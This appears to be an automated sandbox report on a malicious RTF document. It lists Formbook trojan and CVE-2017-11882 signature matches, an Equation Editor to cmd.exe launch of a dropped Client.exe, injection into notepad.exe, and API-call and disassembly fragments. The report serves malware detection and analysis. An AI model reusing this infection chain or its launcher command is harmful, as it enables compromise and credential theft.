          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F13B05_2_001F13B0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F36185_2_001F3618
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F4AB95_2_001F4AB9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FA0605_2_001FA060
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F4AC85_2_001F4AC8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_003403E55_2_003403E5
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59CB05_2_00B59CB0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59EF05_2_00B59EF0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B59AE05_2_00B59AE0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B5A4E85_2_00B5A4E8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B56C105_2_00B56C10
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00B599205_2_00B59920
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C400485_2_04C40048
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C405485_2_04C40548
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4050C5_2_04C4050C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E1639_2_0041E163
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E1669_2_0041E166
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041F9AA9_2_0041F9AA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EA209_2_0041EA20
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0040E3309_2_0040E330
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041EC099_2_0041EC09
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00409DD09_2_00409DD0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041F5849_2_0041F584
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D8B9_2_00402D8B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041E7ED9_2_0041E7ED
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1E0C69_2_00B1E0C6
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4D0059_2_00B4D005
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B9D06D9_2_00B9D06D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3905A9_2_00B3905A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B230409_2_00B23040
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1E2E99_2_00B1E2E9
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC12389_2_00BC1238
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC63BF9_2_00BC63BF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B463DB9_2_00B463DB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1F3CF9_2_00B1F3CF
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B223059_2_00B22305
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B6A37B9_2_00B6A37B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B273539_2_00B27353
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B554859_2_00B55485
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B314899_2_00B31489
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA443E9_2_00BA443E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B5D47D9_2_00B5D47D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B3C5F09_2_00B3C5F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA05E39_2_00BA05E3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2351F9_2_00B2351F
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B665409_2_00B66540
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B246809_2_00B24680
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2E6C19_2_00B2E6C1
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B6A6349_2_00B6A634
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC26229_2_00BC2622
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2C7BC9_2_00B2C7BC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA579A9_2_00BA579A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B557C39_2_00B557C3
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BBF8EE9_2_00BBF8EE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B9F8C49_2_00B9F8C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B4286D9_2_00B4286D
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2C85C9_2_00B2C85C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B229B29_2_00B229B2
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BC098E9_2_00BC098E
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B369FE9_2_00B369FE
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA59559_2_00BA5955
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA394B9_2_00BA394B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BD3A839_2_00BD3A83
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BCCBA49_2_00BCCBA4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BADBDA9_2_00BADBDA
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BA6BCB9_2_00BA6BCB
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B47B009_2_00B47B00
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00BBFDDD9_2_00BBFDDD
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B50D3B9_2_00B50D3B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B2CD5B9_2_00B2CD5B
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B6373B appears 217 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B63F92 appears 116 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B8F970 appears 80 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1DF5C appears 111 times
          Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 00B1E2A8 appears 37 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F24A0 NtQuerySystemInformation,5_2_001F24A0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F2498 NtQuerySystemInformation,5_2_001F2498
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9DC10 NtSetContextThread,5_2_00E9DC10
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9D1F0 NtProtectVirtualMemory,5_2_00E9D1F0
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9CD08 NtAllocateVirtualMemory,5_2_00E9CD08
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9F100 NtResumeThread,5_2_00E9F100
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00E9D700 NtWriteVirtualMemory,5_2_00E9D700
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4B8D8 NtCreateThreadEx,5_2_04C4B8D8
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4B3F8 NtWriteVirtualMemory,5_2_04C4B3F8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AD40 NtCreateFile,9_2_0041AD40
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041ADF0 NtReadFile,9_2_0041ADF0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AE70 NtClose,9_2_0041AE70
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AF20 NtAllocateVirtualMemory,9_2_0041AF20
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AD3A NtCreateFile,9_2_0041AD3A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AE6A NtClose,9_2_0041AE6A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_0041AF1A NtAllocateVirtualMemory,9_2_0041AF1A
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B100C4 NtCreateFile,LdrInitializeThunk,9_2_00B100C4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10078 NtResumeThread,LdrInitializeThunk,9_2_00B10078
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10048 NtProtectVirtualMemory,LdrInitializeThunk,9_2_00B10048
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B107AC NtCreateMutant,LdrInitializeThunk,9_2_00B107AC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F9F0 NtClose,LdrInitializeThunk,9_2_00B0F9F0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F900 NtReadFile,LdrInitializeThunk,9_2_00B0F900
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_00B0FAE8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_00B0FAD0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_00B0FBB8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_00B0FB68
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC90 NtUnmapViewOfSection,LdrInitializeThunk,9_2_00B0FC90
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_00B0FC60
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FD8C NtDelayExecution,LdrInitializeThunk,9_2_00B0FD8C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_00B0FDC0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FEA0 NtReadVirtualMemory,LdrInitializeThunk,9_2_00B0FEA0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_00B0FED0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FFB4 NtCreateSection,LdrInitializeThunk,9_2_00B0FFB4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B110D0 NtOpenProcessToken,9_2_00B110D0
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10060 NtQuerySection,9_2_00B10060
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B101D4 NtSetValueKey,9_2_00B101D4
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B1010C NtOpenDirectoryObject,9_2_00B1010C
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11148 NtOpenThread,9_2_00B11148
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F8CC NtWaitForSingleObject,9_2_00B0F8CC
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11930 NtSetContextThread,9_2_00B11930
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0F938 NtWriteFile,9_2_00B0F938
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FAB8 NtQueryValueKey,9_2_00B0FAB8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FA20 NtQueryInformationFile,9_2_00B0FA20
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FA50 NtEnumerateValueKey,9_2_00B0FA50
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FBE8 NtQueryVirtualMemory,9_2_00B0FBE8
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FB50 NtCreateKey,9_2_00B0FB50
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC30 NtOpenProcess,9_2_00B0FC30
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B10C40 NtGetContextThread,9_2_00B10C40
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FC48 NtSetInformationFile,9_2_00B0FC48
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B11D80 NtSuspendThread,9_2_00B11D80
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 9_2_00B0FD5C NtEnumerateKey,9_2_00B0FD5C
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: mozglue.dllJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: winsqlite3.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\notepad.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: Client.exe.0.drStatic PE information: Section: bdzG4e ZLIB complexity 1.0003269937782806
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfReversingLabs: Detection: 14%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR582D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfStatic file information: File size 2883613 > 1048576
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01185096 push 00000020h; iretd 5_2_01185099
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_01189ABE push ebx; ret 5_2_01189B10
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_011828DB pushfd ; retf 5_2_011828DC
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_011854E3 push 00000020h; iretd 5_2_011854E6
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FA050 push eax; retf 001Eh5_2_001FA051
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F907A push esp; ret 5_2_001F9091
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F9092 pushfd ; ret 5_2_001F9111
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FAA30 push eax; iretd 5_2_001FAA31
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001FAA50 pushad ; iretd 5_2_001FAA51
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F8EDD push eax; retn 001Eh5_2_001F8ED9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_001F8ED8 push eax; retn 001Eh5_2_001F8ED9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C43EA9 push 03682C01h; ret 5_2_04C43EB9
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4381A push 800FD82Bh; retf 006Dh5_2_04C4381F
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4301A push 800FD82Bh; retf 0075h5_2_04C4301F
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C4371A push 800FD82Bh; retf 006Eh5_2_04C4371F
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C632BC push 800FD82Bh; retf 5_2_04C632C1
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C642B8 push 800FD82Bh; iretd 5_2_04C642BD
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C647BD push 800FD82Bh; retf 005Fh5_2_04C647C2
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C63DBB push 800FF02Bh; retf 0069h5_2_04C63DC2
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C64FB8 push 800FC303h; iretd 5_2_04C64FBD
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04C61B75 push 800FC303h; retn 0002h5_2_04C61B7C
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_04E4585D push 800FD82Bh; retf 5_2_04E45888
